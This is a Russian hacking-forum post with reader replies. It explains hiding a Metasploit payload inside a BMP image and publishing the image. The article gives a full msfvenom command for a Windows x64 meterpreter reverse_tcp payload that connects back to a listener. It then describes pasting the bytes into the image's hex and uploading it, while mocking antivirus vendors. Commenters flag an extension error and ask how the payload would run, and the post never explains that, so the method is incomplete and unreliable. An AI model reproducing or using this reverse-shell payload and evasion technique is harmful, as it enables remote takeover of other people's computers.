• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Злая КАРТИНКА Payload

Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt

1.png


как видите у нас получился пэйлод размером 510 байт! Открываем его в текст. редакторе, убираем лишнее с помощью "найти и заменить"

2.png


3.png


4.png

Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!

Screenshot_8.png



переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!

5.png


6.png

7.png

8.png

смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"

Screenshot_9.png

Screenshot_10.png

Screenshot_11.png

Screenshot_12.png


Screenshot_13.png


Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

9.png


допишу как освобожксь... в хату ломится отдел "К")) Колян.. по кличке "сан-техник" Окрестили Мы его так потому что он в молодости ограбил склад с сантехникой, ох как мы тогда гуляли мммм..... как Боги)))

ПС Хочу передать горячий и пламенный привет, труженникам антивирусных компаний смотрите так ребятки, не за брызгайте желчью свои экраны!))))))

продолжение следует!
 
Последнее редактирование:
L

Lipsec

Мне осталось только понять для чего это. Пойду читать матчасть...:confused:
 
  • Нравится
Реакции: citizen2517
B

BuTaluK

"переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat" а тут не должно ли быть расширение .bmp, а то в расширении bat не находит почему-то, может я не правильно что то делаю?
 
  • Нравится
Реакции: citizen2517 и Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
"переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat" а тут не должно ли быть расширение .bmp, а то в расширении bat не находит почему-то, может я не правильно что то делаю?
да, все правильно делаеш !! это я лоханулся.. )) .bmp
 
  • Нравится
Реакции: citizen2517 и BuTaluK
J

jaguar

не получается когда вставляю код в картинку весь код расходится частями при открытии пишет неправильные данные в заголовке
 
  • Нравится
Реакции: citizen2517

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
не получается когда вставляю код в картинку весь код расходится частями при открытии пишет неправильные данные в заголовке
крась в ручную переводи полученый код в цвета и по пикселям выводи свой пэйлоад!
 
  • Нравится
Реакции: Partiizan
A

a113

А каким образом код будет выполняться? не оч понятно (толи лыжи не едут, толи я не того :D )
 
A

a113

а каким образом payload выполняется?
Translate understand))))))))))
Ja, danke, aber wie dies im Bild auf die Umsetzung des сodes bezieht. Es scheint, dass die Frage, die ich fragte, oder nicht auf Ihre Gegenfrage verbunden.
а каким образом платная загрузка выполняется?)))))))))
кстати, не хорошо вопросом на вопрос отвечать.
 
  • Нравится
Реакции: Vertigo
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!